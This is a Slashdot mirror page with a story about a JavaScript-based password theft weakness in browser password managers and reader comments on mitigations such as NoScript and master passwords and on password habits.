Slashdot Mirror

← Back to Stories (view on slashdot.org)

Holes Remain Open in Firefox Password Manager

Posted by Zonk on from the batten-down-the-hatches dept.

juct writes "Although the Mozilla developers have fixed a known hole in the password manager of Firefox & Co, a door remains open for exploitation. According to an article on the heise site, hackers can still use JavaScript to steal passwords from users of the Mozilla, Firefox, and Safari browsers. However, the real problem might not be Firefox' password manager. If users can set up their own pages containing script code on a server, the JavaScript security model breaks. Heise Security demonstrates the possible password theft in a demo. 'From the users' perspective, this means that they should not entrust their passwords to the password manager on web sites that allow other users to create their own pages containing scripts. Otherwise somebody can easily create a page that steals the password as soon as the page is opened ... Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.'"

10 of 191 comments (clear)

  1. Firefox no longer safe? by JamesD_UK · · Score: 4, Funny

    That's it, I'm leaving the Internet. Forever.

    1. Re:Firefox no longer safe? by jimbug · · Score: 4, Funny

      can I have your karma?

      --
      Bite my shiny metal ass.
    2. Re:Firefox no longer safe? by dvice_null · · Score: 4, Insightful

      It is not about safety of the Firefox. It is about safety of websites that allows users to insert Javascript code to their sites. It's like a bank which would allow anyone to step behind the desk and act as an employee of the bank.

      But they can only "steal" the passwords of that website. They can't steal your all passwords. So just remember to select different passwords for websites that might allow users to insert Javascript code on the site. So it doesn't matter that much if they manage to steal your passwords.

      Or use Noscript as suggested. Or simply don't use such websites, as they clearly don't think much about user's security.

  2. Possible fix by Arthur+B. · · Score: 4, Interesting

    Do not use a pull model but a push model like the bugmenot extension. A right click in the login form would allow you to automatically enter saved information. It's much safer.

    --
    \u262D = \u5350
  3. password complexity by farker+haiku · · Score: 4, Interesting

    I used to think (back in my tech support days) that people who couldn't remember their password were just plain stupid. These days, I work in a large firm that has tons of different passwords for everything. Unix passwords, windows passwords, spam mail setting utility password, time tracking utilities have passwords, passwords are required for clearcase/clearquest, remote login, etc. Each of them has different password complexity rules. I no longer criticize people for forgetting their password.

    --
    Your sig(k) has been stolen. There is a puff of smoke!
  4. Clarification by jojoba_oil · · Score: 5, Informative

    Users could also disable JavaScript or use add-ons such as NoScript to set up rules to provide additional protection. In the age of Web 2.0 this would, however, mean that many pages would cease to function. That's very misleading. Allow me to clarify:

    Users could also disable JavaScript, which in the age of Web2.0 would cause many pages to display incorrectly. A better alternative is NoScript!, an add-on that allows users to selectively white-list pages, servers, or domains to use JavaScript.

  5. Firefox password manager by wile_e_wonka · · Score: 4, Interesting

    The thing that scared me away from the password manager in Firefox was a program called System Info for Windows. It lists all sorts of things about your computer--click on "Secrets." It searches for passwords in several programs--I have a few passwords saved in FF and the vast majority in Opera. I saw both programs mentioned in its analysis (meaning it searched both FF and Opera for saved passwords). It listed every saved FF password but no Opera passwords.

    It seems to me that if this program can do that, then it can't be hard for a more nefarious program on my computer to do the same.

    1. Re:Firefox password manager by Derek+Pomery · · Score: 4, Informative

      Your first mistake is not setting a master password in Firefox.
      Once you do that it won't be able to read them either.
      Its failure to read the Opera ones means either A) you set a master password in Opera or B) no one cares about Opera so program doesn't even look for them.

      --
      -- perl -e'print pack"H*","6e656d6f406d38792e6f7267"' /. ate my old sig. Bastards.
  6. Password Managers and Simple Passwords by andrewd18 · · Score: 5, Insightful

    On the other hand it is doubtful that by not using a password manager security levels would be raised, since the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.
    Don't tell me that the presence of an in-browser password manager has anything to do with the strength of the password. The only thing stopping people from using simplistic passwords is the quality of the IT department's restrictions. I bet every salesperson in my office would use "gocubsgo" as their password if our IT department didn't demand at least one capital letter and a number. As such, their passwords are now "goCubsgo2007".

    Don't tell me that an in-browser password manager stops people from using the same password everywhere. The average person sees "password" and a single phrase comes to mind. "Oh, my password is '12345'", they say to themselves, and enter that. They don't sit there and think, "Oh, I should keep my bank account password separate from my MySpace password."

    Those two issues aside, people always use password managers of some kind or another. The difference is whether or not they are vulnerable to an attack. I happen to manage my passwords by memorizing them, whereas my father keeps his monitor covered in sticky notes. My password manager is more secure against people sitting at my desk, while his is more secure against old age, and both of them are safe from internet crackers.

    I don't think there's much we can do about increasing people's password security other than increasing awareness and forcing better password standards.
  7. Re:stupid features by dvice_null · · Score: 4, Insightful

    > Don't want to remember all your passwords? Don't use sites that require passwords.

    Or more specificly: Don't use internet. How many webmails you know that don't use password? You couldn't even write to Slashdot, except anonymously.

    > Do you trust the your real life keys to be managed by a third party, then wonder how someone broke in your house without forced entry?

    Yes, 3rd party has keys to our home. It is quite common with the apartment houses where I live. It is however quite unlikely that they would steal from us, as they would be number one suspects. So far I have never been robbed by they key holders, nor have I ever heard of a case that someone else had been.

    > Having something "remember" your passwords defeats the purpose of having passwords.

    Not really. It just makes the password behave more like client sertificates that automatically identify client to the server.